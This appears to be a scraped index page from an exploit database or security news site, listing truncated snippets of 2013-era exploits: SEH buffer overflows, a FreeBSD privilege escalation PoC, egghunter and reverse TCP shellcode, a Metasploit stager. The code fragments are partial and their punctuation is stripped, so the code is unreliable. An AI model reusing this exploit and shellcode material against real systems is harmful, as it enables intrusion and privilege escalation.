Mediacoder (.lst) - Local Buffer Overflow (SEH)

!/usr/bin/python import os import sys from struct import pack from time import sleep if os.name == "nt": os.system"cls" os.system"color 3f" else: os.system"clear" print """ +Exploit Title: All Mediacoder Product SEH Buffer Overflow +Download All Product: http://www.mediacoderhq.com/editions.html...

ASC Timetables 2013 - Stack Buffer Overflow Vulnerability

Exploit for windows platform in category dos / poc !/usr/bin/python Title : ASC Timetables 2013 - Stack Buffer Overflow Vulnerability Researcher : Souhail Hammou Dark-Puzzle Research Team : http://itsecurity.ma Facebook : http://www.facebook.com/dark.puzzle.sec Date : 22/06/2013 Download Website ...

FreeBSD 9.0+ Privilege Escalation

/ CVE-2013-2171 FreeBSD 9.0+ Privilege escalation via mmap poc by SynQ, rdot.org, 6/2013 don't forget to cp /etc/crontab /tmp / include include include include include include include include char sc="\t\t\t\t\troot\t/tmp/bukeke\n"; void child int status; status = ptracePTTRACEME, 0, 0, 0; if...

Adrenalin Player 2.2.5.3 (.wax) - SEH Buffer Overflow

Exploit for windows platform in category local exploits !/usr/bin/python Title: Adrenalin Player SEH Buffer Overflow software: Adrenalin Player version : 2.2.5.3 Platform: Windows XP sp3 Date: June 16th, 2013 Author: onying @onyiing Blog : http://itsecuritynewbie.blogspot.com/ Thanks to:...

Intrasrv Simple Web Server 1.0 SEH based Remote Code Execution BOF

Exploit for windows platform in category remote exploits !/usr/bin/python import socket import os import sys target="192.168.1.16" W00T egghunter="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + "\x90"94...

Linux/x86 - Egghunter (0x5090) Shellcode (38 bytes)

Linux/x86 - Egghunter 0x5090 Shellcode 38 bytes. Shellcode exploit for Linuxx86 platform / Title : egghunter shellcode : hunter 30 bytes, marker 8 bytes, shellcode 28 bytes Date : 28 May 2013 Author : Russell Willis Testd on: Linux/x86 SMP Debian 3.2.41-2 i686 Comments: Using sigaction system cal...

Samsung Galaxy S4 Android Bootloader Unlocked

Those of you who like to tinker and jailbreak Android phones should take notice of some new research conducted on Samsung Galaxy S4 Android devices shipped by AT&T and Verizon. Both device makers ship the Galaxy S4 smartphones with a locked down bootloader that prevents users from uploading custo...

Ophcrack 3.5.0 - Code Execution Local Buffer Overflow

Ophcrack 3.5.0 - Code Execution Local Buffer Overflow Exploit Title: ophcrack v3.5.0 - Local Code Execution BOF Date: 21.05.2013 Exploit Author: xisone@STM Solutions Vendor Homepage: http://ophcrack.sourceforge.net/ Software Link:...

Linux dup2 Command Shell, Reverse TCP Stager

dup2 socket in r12, then execve. Connect back to the attacker This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework ReverseTcp ---------- Linux reverse TCP stager. module MetasploitModule CachedSize = 260 include...

Linux/x86 - Reverse TCP Bind Shellcode 92 bytes

Linux/x86 - Reverse TCP Bind Shellcode 92 bytes. Shellcode exploit for linx86 platform / Title : reversetcpbindshell 92 bytes Date : 16 May 2013 Author : Russell Willis Testd on: Linux/x86 SMP Debian 3.2.41-2 i686 $ objdump -D reversetcpbindshell -M intel reversetcpbindshell: file format elf32-i3...

No-IP Dynamic Update Client (DUC) 2.1.9 - Local IP Address Stack Overflow

No-IP Dynamic Update Client DUC 2.1.9 - Local IP Address Stack Overflow !/usr/bin/env python Title: No-IP Dynamic Update Client DUC 2.1.9 local IPaddress stack overflow Author: Alberto Ortega @a0rtega [email protected] Date: May 11 2013 vulnerability discovered Background: No-IP is probably the...

No-IP Dynamic Update Client (DUC) 2.1.9 - Local IP Address Stack Overflow

!/usr/bin/env python Title: No-IP Dynamic Update Client DUC 2.1.9 local IPaddress stack overflow Author: Alberto Ortega @a0rtega [email protected] Date: May 11 2013 vulnerability discovered Background: No-IP is probably the most used Dynamic DNS provider worldwide, their Dynamic Update Client D...

No-IP Dynamic Update Client 2.1.9 Stack Overflow

!/usr/bin/env python Title: No-IP Dynamic Update Client DUC 2.1.9 local IPaddress stack overflow Author: Alberto Ortega @a0rtega [email protected] Date: May 11 2013 vulnerability discovered Background: No-IP is probably the most used Dynamic DNS provider worldwide, their Dynamic Update Client D...

[ShellNoob v1.0] Shellcode Writing Toolkit

ShellNoob is a writing toolkit, that helps you to writting some shellcodes, converting to different formats, resolving some boring steps. Features: convert shellcode between different formats currently supported: asm, bin, hex, obj, exe, C, python, ruby, pretty interactive opcode-to-binary...

Mysterious Avatar rootkit with API, SDK, and Yahoo Groups for C&C communication

Early 2012 ESET company a mysterious malware, dubbed the Avatar rootkit Win32/Rootkit.Avatar, advertised in the underground forums by Russian cyber crime. "We present you here previously announced product. In connection with work on other projects, we moved the release date for the public from Ma...

Mysterious Avatar rootkit with API, SDK, and Yahoo Groups for C&C communication

Early 2012 ESET company a mysterious malware, dubbed the Avatar rootkit Win32/Rootkit.Avatar, advertised in the underground forums by Russian cyber crime. "We present you here previously announced product. In connection with work on other projects, we moved the release date for the public from Ma...

AudioCoder 0.8.18 - Local Buffer Overflow (SEH)

!/usr/bin/env ruby Exploit Title:AudioCoder 0.8.18 Buffer Overflow Exploit SEH Download link :http://www.mediacoderhq.com/getfile.htm?site=dl.mediacoderhq.com&file=AudioCoder-0.8.18.exe Vulnerable Product:AudioCoder Date found: 30.04.2013 Date publish: 01.05.2013 RST Author: metacom Version:...

PHP Code Inside GIF Image

GIF images that contain PHP code can be used for malicous purposes. There are cases in which certain traffic, although not intended for malicious use, is very unsafe, since it may transfer shellcode which is undetectable by IPS...

Toxin Based Brobot HTTP Request

Blocking specific Toxin Based Brobot HTTP requests. There are cases in which certain traffic, although not intended for malicious use, is very unsafe, since it may transfer shellcode which is undetectable by IPS...

FuzeZip 1.0.0.131625 - Local Buffer Overflow (SEH)

FuzeZip 1.0.0.131625 - Local Buffer Overflow SEH !/usr/bin/python Exploit Title: SEH BUFFER OVERFLOW IN FUZEZIP V.1.0 Date: 16.Apr.2013 Vulnerability reported Exploit Author: Josep Pi Rodriguez, Pedro Guillen Nunez , Miguel Angel de Castro Simon Organization: RealPentesting Vendor Homepage:...